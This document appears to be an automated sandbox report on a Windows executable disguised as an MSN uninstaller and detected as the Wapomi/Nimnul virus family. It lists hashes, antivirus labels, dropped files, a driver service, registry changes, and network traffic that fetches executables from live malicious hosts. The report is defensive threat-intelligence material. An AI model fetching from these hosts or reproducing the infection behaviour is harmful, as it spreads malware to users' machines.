Analysis Date: 2015-08-30 10:36:12
MD5: c706818999d4ee58e1a92e861bae4593
SHA1: 7a5f1744cb9dc27b25f41f35dfcc7dd9cda8ef94

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: c02003b9f50c63f6a112afcee0c8057e sha1: 7a491315e9fb929b216e9d249e0b05bee0c28465 size: 16384
Section .data md5: 2395a14b242238675b3a7322d039eb97 sha1: 9221e044437a07c96ff3c8a686e1f031edf554aa size: 4096
Section .rsrc md5: baabdff38152118699c72fc17e454372 sha1: 519883dd302e18b465fe071e2fb2957501e1d7ad size: 8192
Section !55u md5: ffccfd36c9221262daf9c80078381cc6 sha1: 7609473bf88e44f5d63c27ecdb506b5d8da32e38 size: 20480
Section .tc md5: e347d822422ba661f7c3e4bf8a8b7f6f sha1: 6bf1063e8583ccbf180c94472bdff061fe1558a8 size: 28672
Section W55uj md5: ac24c787a37de1970c6a76cc925d23ae sha1: f9be0490c0e36e40543b7f0a43fc0faf38f3b8fd size: 20480
Timestamp: 2001-07-19 19:29:57
Pdb path: pdb
Version:
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: MSNUNIN
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: MSN Uninstall Progman
OriginalFilename: MSNUNIN.EXE
PEhash: 1234840ca0de89bfdc80714a9d3a95e2890a2ea7
IMPhash: 2a1c59f2822a4b9e0435e5c824306502
AV Rising: Win32.Roue.a
AV Mcafee: W32/Kudj
AV Avira (antivir): W32/Jadtre.B
AV Twister: Virus.558BEC81EC@120000#.mg
AV Ad-Aware: Win32.VJadtre.3
AV Alwil (avast): Malware-gen:Viking-CF:Win32:Malware-gen:Win32:Viking-CF
AV Eset (nod32): Win32/Wapomi.BA virus
AV Grisoft (avg): Win32/Wapomi.I
AV Symantec: W32.Wapomi.C!inf
AV Fortinet: W32/Nimnul.F
AV BitDefender: Win32.VJadtre.3
AV K7: Virus ( 0040f7441 )
AV Microsoft Security Essentials: Virus:Win32/Mikcer.B
AV MicroWorld (escan): Win32.VJadtre.3
AV MalwareBytes: no_virus
AV Authentium: W32/PatchLoad.E
AV Frisk (f-prot): W32/PatchLoad.E
AV Ikarus: Trojan-Downloader.Win32.Small
AV Emsisoft: Win32.VJadtre.3
AV Zillya!: Virus.Nimnul.Win32.5
AV Kaspersky: Virus.Win32.Nimnul.f
AV Trend Micro: PE_WAPOMI.BM
AV CAT (quickheal): W32.Nimnul.F1
AV VirusBlokAda (vba32): Virus.Nimnul.19209
AV Padvish: no_virus
AV BullGuard: Win32.VJadtre.3
AV Arcabit (arcavir): Win32.VJadtre.3
AV ClamAV: Win.Trojan.Downloader-64296
AV Dr. Web: BackDoor.Darkshell.246
AV F-Secure: Win32.VJadtre.3
AV CA (E-Trust Ino): Win32/Nimnul.A

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\cbikpg.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\vnqCGv.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\vnqCGv.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\cbikpg.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\WINDOWS\system32\cmd.exe

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝ NULL
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝ 3
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝ 4
Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝ 1
Creates File: C:\Documents and Settings\NetworkService\Favorites\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Favorites\Desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates Mutex: Shell.CMruPidlList
Winsock DNS: nbtj.114anhui.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\vnqCGv.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: PIPE\lsarpc
Creates File: C:\temp\files\vnqCGv.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates File: C:\temp\files\malware.exe
Winsock DNS: ddos.dnsnb8.net
Winsock URL: http://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Starts Service: WmdmPmSN

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\cbikpg.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\temp\files\AcroRd32.exe
Creates File: C:\temp\files\AcroRd32Info.exe
Creates File: C:\temp\files\Expor.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates File: C:\temp\files\setup.exe
Creates File: C:\temp\files\instmsiw.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: C:\temp\files\reader_sl.exe
Creates File: PIPE\lsarpc
Creates File: C:\temp\files\Digcore.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\temp\files\malware.exe
Creates File: C:\temp\files\msnsusii.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates File: C:\temp\files\AdobeUpdateManager.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: C:\temp\files\cbikpg.exe
Creates File: C:\temp\files\monitor.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\temp\files\vnqCGv.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates File: C:\temp\files\Msncli.exe
Creates File: C:\temp\files\acroaum.exe
Winsock DNS: ddos.dnsnb8.net
Winsock URL: http://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: NtHid
Creates File: PIPE\lsarpc
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates File: \Device\Afd\AsyncConnectHlp
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 141.8.226.14
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com
Winsock URL: http://141.8.226.14/ko/03.exe
Winsock URL: http://141.8.226.14/ko/02.exe
Winsock URL: http://141.8.226.14/ko/01.exe

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝ 7
Registry: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝ C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates File: WMIDataDevice

Process
↳ Pid 1856

Process
↳ Pid 1168

Network Details:

DNS: nbtj.114anhui.com
Type: A
193.166.255.171
DNS: www.a.shifen.com
Type: A
103.235.46.39
DNS: pc1.114central.com
Type: A
141.8.226.14
DNS: ddos.dnsnb8.net
Type: A
DNS: www.baidu.com
Type: A
DNS: www.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GET: http://141.8.226.14/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://nbtj.114anhui.com/msn/163.htm?2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://141.8.226.14/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://141.8.226.14/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1036 ➝ 141.8.226.14:80
Flows TCP: 192.168.1.1:1038 ➝ 193.166.255.171:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.226.14:80
Flows TCP: 192.168.1.1:1040 ➝ 141.8.226.14:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6d736e 2f313633 2e68746d   GET /msn/163.htm
0x00000010 (00016)   3f322048 5454502f 312e300d 0a416363   ?2 HTTP/1.0..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000050 (00080)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000060 (00096)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000070 (00112)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000080 (00128)   290d0a48 6f73743a 206e6274 6a2e3131   )..Host: nbtj.11
0x00000090 (00144)   34616e68 75692e63 6f6d0d0a 436f6e6e   4anhui.com..Conn
0x000000a0 (00160)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....


Strings